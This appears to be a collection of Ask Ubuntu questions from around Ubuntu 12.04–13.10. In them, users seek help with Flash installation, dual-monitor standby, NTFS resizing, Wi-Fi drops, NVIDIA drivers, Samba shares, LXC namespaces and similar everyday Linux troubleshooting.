366928	help installing some java and flash	i have git now and some other stuff , but i 've looked around and all and i do n't get very helpful information . i 've used these instructions : download the latest version of flash player from the adobe website . click on download the latest player and choose `` .deb for ubuntu '' from the dropdown list . choose `` save file '' from the pop up window . open a terminal window . the terminal window will be found under applications - > utilities . change to the directory where your downloaded file was saved . cd downloads install the libcurl3 library . sudo apt-get install libcurl3 install the flash player . sudo dpkg -- install install_flash_player_ < version > _linux.deb replace with the latest version number . restart firefox . check that flash player was installed . type about : plugins in a browser window , and look for the flash player mime type . read more : http : //www.ehow.com/how_5068467_install-flash-player-ubuntu.html # ixzz2ixpj47qs what i do n't understand is how i change the directory and all that crap which they say everyone knows .
366929	second monitor stays black/in power save mode	i 'm using two monitors , a belinea o.display 1 ( recognized as a rogen tech distribution inc 20 '' by ubuntu , but working fine ) on the dvi-output ( connected via dvi-to-vga-adapter ) as my primary monitor and a dell 19 '' ( recognized correctly ) on the hdmi-output ( via hdmi-to-dvi adapter ) as secondary monitor . the graphics controller is a geforce 9500 gs . i 'm running a fully updated ubuntu 13.04 with nouveau 1:1.0.7-0ubuntu1 . the problem is that the second monitor ( dell ) never seems to come out of standby during boot : the screen stays black and the status led on the monitor stays orange ( it 's green when it 's on ) . it is correctly recognized an the size of the desktop is set accordingly , it just stays black . changing any setting via xrandr/arandr/etc . does nothing . the on-screen-menu of the monitor reports it to be in power save mode . when using the proprietary nvidia-drivers , the second monitor works just find . but these drivers cause a lot of other problems on my system , so i would really like to avoid them . on ubuntu 12.10 i had found a workaround : when moving the relative position of the second monitor slightly down and the up again , it would turn on and function normally : xrandr -- output dvi-i-1 -- mode 1680x1050 -- pos 1280x0 -- rotate normal -- output hdmi-1 -- mode 1280x1024 -- pos 0x88 -- rotate normal sleep 2 xrandr -- output dvi-i-1 -- mode 1680x1050 -- pos 1280x0 -- rotate normal -- output hdmi-1 -- mode 1280x1024 -- pos 0x0 -- rotate normal this workaround stop working after the update to 13.04 , and now i 'm looking for a new solution . has anyone experienced something similarity ? xrandr output : screen 0 : minimum 320 x 200 , current 2960 x 1050 , maximum 8192 x 8192 dvi-i-1 connected 1680x1050+0+0 ( normal left inverted right x axis y axis ) 433mm x 270mm 1680x1050 60.0*+ 1280x1024 75.0 60.0 1280x960 60.0 1152x864 75.0 1024x768 75.1 72.0 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 72.8 75.0 66.7 60.0 720x400 70.1 hdmi-1 connected 1280x1024+1680+0 ( normal left inverted right x axis y axis ) 376mm x 301mm 1280x1024 60.0*+ 75.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 lshw -c video : *-display beschreibung : vga compatible controller produkt : g96 [ geforce 9500 gs ] hersteller : nvidia corporation physische id : 0 bus-informationen : pci @ 0000:01:00.0 version : a1 breite : 64 bits takt : 33mhz fähigkeiten : pm msi pciexpress vga_controller bus_master cap_list rom konfiguration : driver=nouveau latency=0 ressourcen : irq:16 memory : fa000000-faffffff memory : d0000000-dfffffff memory : f8000000-f9ffffff ioport : df00 ( größe=128 ) memory : fb000000-fb07ffff thanks for your help !
366934	acer sound card	hi i have an acer aspire on a recent upgrade somehow it loaded dummy output into upper memory so every time i boot up i have to manually load my sound card . using sudo /sbin/alsa reload then alsamixer and f6 to change to my proper sound card . how do i go about making that my default sound card loading on boot every time . sometimes the message comes up can not find alsamixer , if that happens i have to run the following command sudo /sbin/alsa force-reload and then alsamixer . that works only on current session i would like to get that so it boots without coming up with dummy output . anyone out there know what the command is to make that load to boot section ?
366935	ntfsresize volume and size information	i am going to resize my sda2 ntfs partition . when gathering info with ntfsresize , i get : ntfsresize -- info /dev/sda2 ntfsresize v2013.1.13 ( libntfs-3g ) device name : /dev/sda2 ntfs volume version : 3.1 cluster size : 4096 bytes current volume size : 21999993344 bytes ( 22000 mb ) current device size : 23622320128 bytes ( 23623 mb ) checking filesystem consistency ... accounting clusters ... space in use : 10673 mb ( 48.5 % ) collecting resizing constraints ... you might resize at 10672590848 bytes or 10673 mb ( freeing 11327 mb ) . please make a test run using both the -n and -s options before real resizing ! can you tell me what is the difference between volume and device size ? as for device size , 23622320128 bytes / 1000^2 = 23622.3 mb . why is 23623 mb reported instead of 23622 ? note that parted confirms this value : parted /dev/sda2 unit mb p model : unknown ( unknown ) disk /dev/sda2 : 23622mb sector size ( logical/physical ) : 512b/512b partition table : loop disk flags : number start end size file system flags 1 0.00mb 23622mb 23622mb ntfs
366937	drive re-partitioning how do i add the unallocated space to dev sda2 ?	here is what my drives look like : sda2 is a windows drive and sda6 is ubuntu . not necessarily using gparted , what is the best way to extend sda2 so that is had the unallocated space added to it ?
366944	tons of problems a new user is encountering	i 've borrowed this laptop from a friend . i wanted to install adblock to boost performance . first weird thing was that even though i was on chrome , chrome suggested me installing him ? so i tried to install , than it gave me some message about broken dependencies . i googled and tried to run those commands you guys were suggesting , but than it popped up error messages about everything again . than i found out that some package called linux image generic is broken , than i tried to find an answer to that , but on the topic it was â ndk.bhj\spo ; ujvsdljvaeoyufgidgapif ; hsgvk in other words , i did n't understand anything about it , than there 's this thing : e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? seriously , when i 'm trying to fix an error , there is another one . i 'm on something called gnome . sooo , where do i start ?
366948	completely uninstall xbmc from ubuntu 12.04	i want to start over with my set-up on xbmc . i tried an install from hub wizard 1.0.7 zip , but now there are a ton of enabled add-ons that will take too long to uninstall . so i am hoping i can just delete the entire program , with any left over files , and start over with xbmchub repository only . oddly , i ca n't find this answer on google . is there a command that wipes it all clean ? thanks . edit : in truth , i really wanted to uninstall so i could re install and start over . there were some bugs that xbmctalk forced onto the program and i wanted to get rid of xbmctalk 's addons for good . it turns out xbmchub just uploaded a `` fresh install hub wizard '' which was under fusion zipfile . i ran that , and it got me back to brand new , fresh xbmc . then i ran the newest v1.0.7 hub wizard , and that got me where i wanted to be . thanks everyone for your help . a few of the answers below did not work for me , but i got to where i needed anyways . edit ( months later ) : i am on a new computer and new build . i was having issues with xbmc again after a fresh install . i found that the second answer to this question : sudo apt-get purge xbmc xbmc-standalone was quickest and easiest way to completely erase xbmc .
366949	may i know the password for lightdm ?	lightdm @ hemura-x450cc : /home/hemura $ sudo gsettings set com.canonical.unity-greeter draw-grid false [ sudo ] password for lightdm : sorry , try again . i typed the right password but it does n't work
366952	force ntfs volumes to be treated like any other by default	i have a 20 gb ntfs volume that i was planning on using for a variety of purposes , including being readable by windows with little effort . unfortunately , for some reason , i can not execute any files on the drive , even after following the answer here ( i was able to mount the volume just fine , but the error persists ) . how can i fix this ? output from mount : /dev/sda1 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) none on /sys/fs/pstore type pstore ( rw ) systemd on /sys/fs/cgroup/systemd type cgroup ( rw , noexec , nosuid , nodev , none , name=systemd ) gvfsd-fuse on /run/user/1000/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=daniel )
366955	why does n't my c program print the correct string ?	i am writing a simple c program which reverses a string , taking the string from argv [ 1 ] . here is the code : # include < stdio.h > # include < stdlib.h > # include < string.h > char* flip_string ( char *string ) { int i = strlen ( string ) ; int j = 0 ; // does n't really matter all i wanted was the same size string for temp . char* temp = string ; puts ( `` this is the original string '' ) ; puts ( string ) ; puts ( `` this is the \ '' temp\ '' string '' ) ; puts ( temp ) ; for ( i ; i > =0 ; i -- ) { temp [ j ] = string [ i ] if ( j < = strlen ( string ) ) { j++ ; } } return ( temp ) ; } int main ( int argc , char *argv [ ] ) { puts ( flip_string ( argv [ 1 ] ) ) ; printf ( `` this is the end of the program\n '' ) ; } that 's basically it , the program compiles and everything but does not return the temp string in the end ( just blank space ) . in the beginning it prints temp fine when it 's equal to string . furthermore if i do a character by character printf of temp in the for loop , the correct temp string in printed i.e . string - > reversed . just when i try to print it to standard out ( after the for loop/ or in the main ) nothing happens - only blank space is printed .
366960	what credentials should i use to access a windows share ?	hi , i have installed samba and cifs and all that , followed a bunch of tutorials , but still i ca n't access a share in the separate windows 7 machine . before i could access a share in ubuntu from windows , but although now i ca n't for whatever reason ; the error of the attempt to mount the windows share is the same : 13 , asking for credentials ( the computer with windows is off now , but i can add the exact error message later ) . in /etc/fstab i have : # ... ( help info ) ... # < file system > < mount point > < type > < options > < dump > < pass > # ... ( mounting points that do n't matter for the question ) ... //192.168.1.2/c\ : /users/public/documents /srv/z\ : / cifs user=guest , password= , uid=1000 , iocharset=utf8 0 0 i also tried options such as username=guest , uid=1000 , iocharset=utf8 and guest , uid=1000 , iocharset=utf8 , which , of course , do n't work . what user am i supposed to use ? ( user=user ; username=user ; my credentials in the windows and ubuntu machines do not work , at least with the syntax i tried - similar to this ) . even if this worked it 's not actually what i want . i wanted to setup an authentication for any one trying to access the drive ( it 's currently 777 , for the linux share as well ) and put a limit/quota on the share 's use ( as i see z : on windows , it allows for the entire c : drive to be filled ) . thank you in advance . i 'd be glad if you suggested a way to do this even without the last paragraph .
366961	how to set up ubuntu in an empty partition i created on my laptop hd	i took 50 gigs of space and partitioned it off in windows . i then removed rights from any user with access to the computer as it is part of a domain . i 'm not pc literate enough to know exactly which options to select in order to install ubuntu into the partition . i do not know which selections to make for the otions that are shown on the partition window during the installation process . if anyone could inform me how to correctly do this it would be much appreciated !
366964	trying to dual boot ubuntu 13.10 and windows 8.1 on my laptop however ubuntu installer doesnt pick up windows 8.1	i have my bootable usb , my secure boot turned off , and have managed to boot into 'trying ubuntu ' and begin the install process . however when i reach the tab that asks how i would like to install for example erase everyting and install , something else , etc . it says that no other os is detected on the computer . my worry is that if i proceed with something else and install anyway grub wont allow me to boot into windows 8.1 . anyone encountered this ? thanks
366965	not working 635m nvidia drivers in ubuntu 12.04	i 've been having a nightmare trying to install the 635m nvidia drivers in my asus n46vj . i 've install bumblebee and follow a bunch of suggestion from many places , i think maybe all the attempts i 've done to install the drivers are in conflict with each other or maybe i 'm missing one important step . my current status is this : according to system details , i 'm not using my nvidia card . i checked for the additional drivers and always got nothing , after many tries but without knowing how , i got , finally ! , some driver in the list . in my desperate intent to try to get the card to work i tried to activated all the listed options , but it seems not to make any difference . as you can see in the picture the driver is `` not currently in use '' when i open the nvidia x server settings , i get this message . then i go to the terminal and get this message : and use this line command to restart sudo restart lightdm after that i got this message and i 'm stuck in a 640x840 resolution . : s additionally all the system and ndivia settings are the same as before . to get back to my resolution i use this command line . cd /ext/x11 sudo rm xorg.conf i 've seen something about kernel , headers and `` black lists '' but honestly i have no idea what are those things . i know this is kind a known and common problem but i could n't resolve it . is something inherent to ubuntu 12.04 ? maybe i 'm still to much new at it . thanks for your time .
366968	my wifi drops constantly on my university network ( wpa2 / peap )	my wifi connection to my university wifi , which is a peap/wpa2/mschapv2 network with no offered certificate , drops constantly . it has a weird pattern where earlier in the day it drops fairly rarely ( ~every 30 minutes ) , but as the time spent on the device increases , it drops more and more until times when drops occur every 2-3 minutes , and eventually it becomes basically impossible to connect , at which point i try turning networking off/on , which sometimes works , or deleting and recreating the saved network , which often works , but both of these fixes still just give me a few more minutes . rebooting tends to `` reset '' the issue back to a point where it does n't drop as often , but again it decays with time . i 'm currently on elementary ( ubuntu 12.04 ) , but i 've run sudo apt-get upgrade and dist-upgrade , so i imagine that everything is up to date . additionally , i experienced the exact same problem a few weeks ago on 13.04 . fixes i 've already tried : ( 1 ) setting ipv6 connection to `` ignore '' in the network manager dialog box . does n't seem to do anything . ( 2 ) setting system-ca-cert=false in /etc/networkmanager/system-connections . the line seems to always be removed and i 've never seen system-ca-cert=true in there . here 's my systems-connection file for reference : [ ipv6 ] method=ignore [ connection ] id=ssid_name uuid=xxx-xxx-xxx type=802-11-wireless timestamp=1382910760 [ 802-11-wireless-security ] key-mgmt=wpa-eap [ 802-11-wireless ] ssid=ssid_name mode=infrastructure mac-address=00:23:15 : ae : f4 : f0 security=802-11-wireless-security [ 802-1x ] eap=peap ; identity=username phase2-auth=mschapv2 password=mypassword [ ipv4 ] method=auto and here 's some info about my wireless card : description : wireless interface product : centrino advanced-n + wimax 6250 [ kilmer peak ] vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 5f serial : 00:23:15 : ae : f4 : f0 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.2.0-54-generic firmware=41.28.5.1 build 33926 ip=10.164.93.55 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn any way i could fix this ? it 's killing me and basically making using ubuntu impossible at my university after being a dedicated user for 6 years .
366969	how to make the command line / terminal mirror the gui ?	when using the gui and making actions i think that users would like to see how those actions are being reflected in the terminal using command lines . i can imagine that there are different layers of commands/processes that could be reflected which are endless but lets keep it simple and in direct relation to the end user gui experience . examples : opening an applications such libreoffice or web browser ... browsing home folders and copy , cut , paste ... network manager changes such as wireless up , down and wired up , down ... and so on ... this would satisfy curiosity and also help as a teaching/learning tool for those curious about the command line . do others see this need ? does this already exist and if not would this be feasible for an end user teaching experience ?
366971	suspend doesn ' twork properly in 13.10	i just upgraded my asus 1015e from 12.04 to 13.04 , then to 13.10 . from gnome flashback ( no effects ) , if i select `` suspend '' or close the lid , the computer does not go into low power mode , instead acting like i hit the `` lock screen '' button . i 'd like to avoid having to turn the computer off every time i need to shut the lid .
366975	macbook pro wo n't boot after 13.10 upgrade	i tried to update my macbook pro to ubuntu 13.10 , i was on 13.04 . so i used the update app and then it downloaded and installed . then i turned down the brightness and left it . after a while i tried to turn the brightness back up but it did n't react . so i rebooted it but it displays : filesystem check or mount failed . a maintenance shell will now be started . control-d will terminate this shell and continue booting after retrying filesystems . any further errors will be ignored . as i 'm a ubuntu newbie i 'd appreciate it of somebody could help me .
366976	ubuntu 13.10 ca n't poweroff acer aspire e1-522	i have this aspire brand new , ubuntu is working 100 % apart from shutdown , or better , it just ca n't poweroff . if i perform a verbose shutdown , i can see that everything works , kill processes , unmounting and all , at the end it says `` power off '' and it hangs . i 've tried all combinations of acpi=off , noirq , noacpi and others and the result is the same . any help ? i attach machine data : fidapa @ fidapa-ubuntu : ~ $ lspci 00:00.0 host bridge : advanced micro devices , inc. [ amd ] family 16h processor root complex 00:01.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] kabini [ radeon hd 8240 ] 00:01.1 audio device : advanced micro devices , inc. [ amd/ati ] device 9840 00:02.0 host bridge : advanced micro devices , inc. [ amd ] family 16h processor function 0 00:02.2 pci bridge : advanced micro devices , inc. [ amd ] family 16h processor functions 5:1 00:02.3 pci bridge : advanced micro devices , inc. [ amd ] family 16h processor functions 5:1 00:10.0 usb controller : advanced micro devices , inc. [ amd ] fch usb xhci controller ( rev 01 ) 00:11.0 sata controller : advanced micro devices , inc. [ amd ] fch sata controller [ ahci mode ] ( rev 40 ) 00:12.0 usb controller : advanced micro devices , inc. [ amd ] fch usb ohci controller ( rev 39 ) 00:12.2 usb controller : advanced micro devices , inc. [ amd ] fch usb ehci controller ( rev 39 ) 00:13.0 usb controller : advanced micro devices , inc. [ amd ] fch usb ohci controller ( rev 39 ) 00:13.2 usb controller : advanced micro devices , inc. [ amd ] fch usb ehci controller ( rev 39 ) 00:14.0 smbus : advanced micro devices , inc. [ amd ] fch smbus controller ( rev 3a ) 00:14.2 audio device : advanced micro devices , inc. [ amd ] fch azalia controller ( rev 02 ) 00:14.3 isa bridge : advanced micro devices , inc. [ amd ] fch lpc bridge ( rev 11 ) 00:18.0 host bridge : advanced micro devices , inc. [ amd ] family 16h processor function 0 00:18.1 host bridge : advanced micro devices , inc. [ amd ] family 16h processor function 1 00:18.2 host bridge : advanced micro devices , inc. [ amd ] family 16h processor function 2 00:18.3 host bridge : advanced micro devices , inc. [ amd ] family 16h processor function 3 00:18.4 host bridge : advanced micro devices , inc. [ amd ] family 16h processor function 4 00:18.5 host bridge : advanced micro devices , inc. [ amd ] family 16h processor function 5 01:00.0 ethernet controller : qualcomm atheros qca8171 gigabit ethernet ( rev 13 ) 01:00.1 sd host controller : qualcomm atheros device 3010 ( rev 13 ) 05:00.0 network controller : qualcomm atheros qca9565 / ar9565 wireless network adapter ( rev 01 ) fidapa @ fidapa-ubuntu : ~ $ sudo dmidecode -t 2 # dmidecode 2.12 smbios 2.7 present . handle 0x0002 , dmi type 2 , 16 bytes base board information manufacturer : acer product name : aspire e1-522 version : v2.02 serial number : nby2z11002325001c56600 asset tag : base board asset tag features : board is a hosting board board is replaceable location in chassis : base board chassis location chassis handle : 0x0003 type : motherboard contained object handles : 0 thanks
366977	lubuntu - audio drives not recognized	i typed sudo dpkg -l | grep -e alsa -e pulseaudio again , and got this : ii alsa-base 1.0.25+dfsg-0ubuntu4 all alsa driver configuration files ii alsa-utils 1.0.25-4ubuntu2 i386 utilities for configuring and using alsa ii gnome-alsamixer 0.9.7~cvs.20060916.ds.1-3ubuntu1 i386 alsa sound mixer for gnome ii gstreamer0.10-alsa : i386 0.10.36-1.1ubuntu1 i386 gstreamer plugin for alsa ii gstreamer0.10-pulseaudio : i386 0.10.31-3+nmu1ubuntu2 i386 gstreamer plugin for pulseaudio ii pulseaudio 1:3.0-0ubuntu6 i386 pulseaudio sound server ii pulseaudio-module-x11 1:3.0-0ubuntu6 i386 x11 module for pulseaudio sound server ii pulseaudio-utils 1:3.0-0ubuntu6 i386 command line tools for the pulseaudio sound server after the commands in 2. , pulseaudio is working again , but there is still no sound.. i tried the command in 3. , and here is what i got : ~ $ sudo gedit /etc/default/speech-dispatcher sudo : gedit : command not found
366979	wlan empfang schlecht// wlan reception very bad	on windows 8 the wlan reception was great , no problems . but since i have ubuntu 12.04 , the reception is very bad . when i move a few meter from my router , my internet slows down ... have anyone an idea or a tip for me ? hallo an alle deutsch-sprachigen hier im forum : ) auf windows 8 hat ich keine probleme mit dem wlan empfang , alles lief super . aber seit dem ich ubuntu 12.04 auf dem laptop habe , ist der empfang sehr schlecht . sobald ich ein paar meter vom router weggehe , wird alles sehr langsam . ( fritzbox ) hat irgendjemand eine idee bzw einen tipp ?
366984	after apple upgrade i 'm unable to boot into my ubuntu 13.10 via refit partition	i 'm currently running ubuntu 13.10 on a minimac through a refit partition ( 500gb mac - 1.5 tb linux ) . today i took an apple upgrade to osx maverick which was fine and when i tried to boot back into linux , the refit screen opened , offering me apple or ubuntu . i selected ubuntu and got 'no bootable device -- insert boot disk and press any key . any help will be appreciated .
366985	ubuntu 13.10 nautilus sidebar no longer dark	i was trying to make the entire nautilus window dark , and i guess i messed something up . the nautilus 3.8.2 sidebar is no longer dark . how do i revert it back to dark ?
366986	hp 1020 wo n't print , ubuntu 12.04	my hp 1020 printer does n't print . i just updated to ubuntu 12.04 . my printer worked just fine in my previous ubuntu version . the printer appears in the system configuration , appears to be installed , has a green check mark , says inactive - ready to print , but i ca n't print anything , not even the test page . the system does n't inform me of any errors either . the printing jobs are listed in the printing row , and then they disappear , as if they had been completed , only they are not . i tried printing pdfs , webpages , and it does n't work . help please ! !
366987	how can i run ubuntu on a computer without a harddrive ?	i found a computer that was thrown a way and it has no hard drive but it did have 2 cd burners and an ubuntu 10.04 cd . what do i do from here to install it ?
366993	ubuntu loading error	when i start ubuntu with dual boot , purple screen with `` ubuntu '' and loading bellow , then left on my sreen come up `` password '' .5 seconds later , my screen its totally purple , and stay like this , i cant find problem , i uninstall wubi , and then install again , but problem is there again.please , help me .
366994	how to identify game controller for sdl2 in ubuntu ?	i 'm trying to make costume quest ( game by double fine ) use either of my gamepads and according to developer 's support all i need to do is add sdl2 config line to sdlgamepad.config file , however , i ca n't find the correct values for uuid . none of the values provided by lsusb , dmesg or udevadm match examples ( below ) where uuid is 32 chars long ( first column ) : 030000006d0400001ec2000020200000 , logitech rumble gamepad f510 ( linux ) , a : b0 , b : b1 , x : b2 , y : b3 , start : b7 , back : b6 , guide : b8 , leftstick : b9 , rightstick : b10 , leftshoulder : b4 , rightshoulder : b5 , dpup : h0.1 , dpleft : h0.8 , dpdown : h0.4 , dpright : h0.2 , leftx : a0 , lefty : a1 , rightx : a3 , righty : a4 , lefttrigger : a2 , righttrigger : a5 , 030000005e0400008e02000014010000 , microsoft xbox 360 gamepad ( xpad ) ( linux ) , a : b0 , b : b1 , y : b3 , x : b2 , start : b7 , guide : b8 , back : b6 , leftstick : b9 , rightstick : b10 , leftshoulder : b4 , rightshoulder : b5 , dpup : h0.1 , dpleft : h0.8 , dpdown : h0.4 , dpright : h0.2 , leftx : a0 , lefty : a1 , rightx : a3 , righty : a4 , lefttrigger : a2 , righttrigger : a5 , what should i use there ? my config file entries do n't work : 0003:0e8f:0012.0016 , greenasia inc. usb wireless 2.4ghz gamepad , a : b1 , b : b2 , y : b3 , x : b0 , start : b9 , guide : b13 , back : b8 , leftstick : b10 , rightstick : b11 , leftshoulder : b4 , rightshoulder : b5 , dpup : h0.1 , dpleft : h0.8 , dpdown : h0.4 , dpright : h0.2 , leftx : a0 , lefty : a1 , rightx : a2 , righty : a3 , lefttrigger : b6 , righttrigger : b7 , 0003:0079:0006.0011 , dragonrise inc. generic usb joystick , a : b1 , b : b2 , y : b3 , x : b0 , start : b9 , guide : b13 , back : b8 , leftstick : b10 , rightstick : b11 , leftshoulder : b4 , rightshoulder : b5 , dpup : h0.1 , dpleft : h0.8 , dpdown : h0.4 , dpright : h0.2 , leftx : a0 , lefty : a1 , rightx : a3 , righty : a4 , lefttrigger : b6 , righttrigger : b7 , lsusb output : bus 002 device 049 : id 0079:0006 dragonrise inc. generic usb joystick bus 002 device 048 : id 0e8f:0012 greenasia inc. usb wireless 2.4ghz gamepad ==== edit ==== in case someone came here only for this , this is my greenasia inc. config , working on linux using xpad : 030000008f0e00001200000010010000 , greenasia inc. , a : b2 , b : b1 , y : b0 , x : b3 , start : b9 , guide : ,back : b8 , leftstick : b10 , rightstick : b11 , leftshoulder : b6 , rightshoulder : b7 , dpup : h0.1 , dpleft : h0.8 , dpdown : h0.4 , dpright : h0.2 , leftx : a0 , lefty : a1 , rightx : a2 , righty : a3 , lefttrigger : b4 , righttrigger : b5 ,
366997	trying to sync my google calender with my ubuntu desktop using conky and gcalcli but i am getting an error	following this guide on conky and gcalcli , i was trying to sync my google calender with my ubuntu desktop . after i do everything and try to run conky , i get the following error : traceback ( most recent call last ) : file `` /usr/bin/gcalcli '' , line 1524 , in < module > bowchickawowwow ( ) file `` /usr/bin/gcalcli '' , line 1292 , in bowchickawowwow cfg = loadconfig ( configfile ) file `` /usr/bin/gcalcli '' , line 1174 , in loadconfig config.read ( os.path.expanduser ( configfile ) ) file `` /usr/lib/python2.7/configparser.py '' , line 305 , in read self._read ( fp , filename ) file `` /usr/lib/python2.7/configparser.py '' , line 512 , in _read raise missingsectionheadererror ( fpname , lineno , line ) configparser.missingsectionheadererror : file contains no section headers . file : /home/timur/.gcalclirc , line : 1 'user : `` myusername '' \n' note : my text file does actually contain my username .
367000	which userprivileges are needed to burn dvd with k3b ?	i recently upgraded to kubuntu 13.10 and now i can not burn any dvd anymore . it seems like my main user doesent have the rights anymore to mount a rewriteable dvd . to which groups do i have to add the user ? i use kdesu kuser to manage users and group . i thought maybe i get a hint , if i start it from the console , there i see some warnings : http : //pastebin.com/nzta7g9v
367003	compaq now refuses to use wifi in ubuntu 12.04 but it used to ... what can i do ?	after much time spent trying seemingly every possible solution that the internet could give me , i just have no clue what to do . the laptop that i am having trouble on is a compaq cq58 , with ubuntu 12.04 installed after windows 8 totally failed . the owner of the laptop wanted me to put something better on there , i first tried xubuntu 13.04 ( which i am currently using to write this , on a different laptop ) install disc but it wouldn´t install grub correctly , so i found an old 12.04 lts ubuntu install disc and it worked fine . internet worked , grub was fine , it was perfect . i downloaded things as usual , and gave it back to its happy owner , able to single boot straight into ubuntu . upon reaching the owner´s home , wireless internet worked . firefox loaded things without any issue , and i thought it was ready to be used . fast forward a week later , the owner tells me it won´t connect to the internet . a ´hardware switch´ blocks it apparently , and no networks are shown even though the enable wireless selection is checked on . i have looked online for over a week now trying to find a reason for it´s failure to connect . i have checked into the bios settings ( secureboot on/off toggle does not affect it ) , and bios does not have any settings for wireless connectivity . resetting to bios defaults fails to help either . i have also tried ´rfkill list all´ , here is what it shows : 0 : phy0 : wireless lan soft blocked : no hard blocked : yes 1 : hp-wifi : wireless lan soft blocked : yes hard blocked : no if i press the only hard switch that i can find , the f12 key , it will toggle the 2nd entry´s hard blocked on and off . the f12 key remains orange regardless of its on/off state . doing rfkill unblock/block all only toggles 1st entry´s soft blocked off/on . here is the output of iwconfig , maybe this can help ? eth0 no wireless extensions lo no wireless extensions wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=off retry long limit:7 rts thr : off fragment thr : off power management : off the last 3 lines belong to wlan0 . i have also tried the battery method , removing the battery , plugging in , still nothing helps . the network settings show that it never once had ever connected to any networks , which i found odd , because i witnessed it doing so ! it also showed that ubuntu was in airplane mode . i turned that off , and tried to click the switch to turn wireless on but it kept reverting to off yet i could see it was on for ~0.3 seconds . i made sure airplane mode was off , and closed the window . when i returned to the window , it was on again ! why ? i am considering wiping the machine clean ( there is not even a trace of win8 anyway ) and using 13.10 standard ubuntu , but i would prefer to not have to download an entire disc right now . are there any solutions i am blatantly missing ? what can i do ? thanks in advance for any help !
367005	install interruption	i have a partitioned machine vista/13.04 . when installing 13.10 upgrade , i had a power outage . now i ca n't start the machine in ubuntu . i 'm not sure what to do next . anyone have any thoughts ?
367008	how can i reinstall pulseaudio ? ( 12.04 64bit )	i accidentally removed pulseaudio from my ubuntu 12.04 64bit . i have tried reinstalling it using sudo apt-get install pulseaudio but my sound card does n't appear in the list of the devices ( in system settings -- > sound ) . for the moment i managed to get sounds by using alsa , but i would like to reinstall pulseaudio and have it working as before my accidental removal . how can i reinstall it and have the devices configured correctly ?
367011	boot windows 7 iso from grub2	i want to do it because i want to install windows 7 and my bios menu does n't appear ; it skips to grub2 menu at start , but that 's another story ... is there a way to boot the windows 7 installation iso directly from grub2 ?
367012	lxc pid namespace	i 've been playing around a tad with lxc recently and one of the things i could n't figure out is how are lxcs in ubuntu implementing namespacing - in particular pid namespacing . i ca n't seem to find any reference to pid namespacing in /proc . ie : vagrant @ precise64 : ~ $ ps -ef|grep lxc-start root 19096 1 0 oct27 ? 00:00:00 lxc-start -n mysecond -d vagrant 21431 1037 0 00:28 pts/0 00:00:00 grep -- color=auto lxc-start vagrant @ precise64 : ~ $ sudo ls -l /proc/19096/ns/ total 0 -r -- -- -- -- 1 root root 0 oct 27 22:09 ipc -r -- -- -- -- 1 root root 0 oct 27 22:09 net -r -- -- -- -- 1 root root 0 oct 27 22:09 uts vagrant @ precise64 : ~ $ now i can see that ipc , net and uts namespace are indeed in place but no sign of pid one . i 'm sure there is something i 'm missing as pid namespacing does seem to work - when i attach to the container 's console and run ps -ef it does indeed return only a list of processes running inside the lxc - not all processes running on the host . anyone idea what should i be looking for ? thanks
367018	help for ubuntu touch	can you install ubuntu touch on any android phone ? i would like to try it on my xperia e c1505/c1504 phone . if i do then can i go back to using android ?
367019	how to disable screen and powersaving during video playback	so i have noticed , even going back to ubuntu 11.xx releases the screen for some ungodly reason dims itself while a video is playing . iv'e even observed the thing go into sleep mode with the audio still going till it shut itself off . here we are at 13.10 and this is still the case > : { ( same with mint15 and fedora ) it does n't matter if i 'm using vlc or watching youtube on firefox or chrome . the darn computer for some reason thinks nothing is going on ! i could go into how this never happened on windows nor mac , but i 'll just say this ; why is n't this something built in by default ! ! ! has anyone a working ( ie the famous one i 've run into do n't work/refer to sites or scripts that no longer exist ) system level tweak/script/fix for this nonsense ? ! ( before i throw my already dying laptop out the window )
367020	lenovo y570 gt555m	maybe im noob , but just using ubuntu like 4 days , my laptop is lenovo y570 with nvidia gt555m , all four days i cant setting my drivers , i google everywhere , but there is no good decision = ( trying ubuntu 12.04-13.10 and always have some problem . now i try 13.10 agine , looks like installed all.whan i try to open firefox with command -optirun firefox , its opening , but i have this error sasha @ sasha-lenovo-ideapad-y570 : ~ $ optirun firefox ( process:5721 ) : glib-critical ** : g_slice_set_config : assertion 'sys_page_size == 0 ' failed somewhere in forums , i find that y570 and some other models do n't support linux or smth like this ... i need some guru to support me with ubuntu , my main destination for now , make possible to play dota 2 on linux , and than i would like to make other options on ubuntu . help me please , 4 days no results , i try hard , realy ! sleep just one night make me borred.cant work alone anymore . sorry for my english thanks for help !
367026	add ppa cassou/emacs	when i run following command in terminal : sudo add-apt-repository ppa : cassou/emacs it says : can not add ppa : 'ppa : cassou/emacs ' . please check that the ppa name or format is correct . also i am unable to add any other ppa .
367027	how to install ubuntu in the hp envy 3040nr ?	i have tried installing the os via usb key and dvd . in both cases even when the device is chosen as boot option the os does not initiate and the laptop refers back to windows 7 .
367031	/casper/vmlinuz : not found ubuntu builder	okay , i have a error /casper/vmlinuz : not found when i click the try button on ubuntu builder . how do i fix this ?
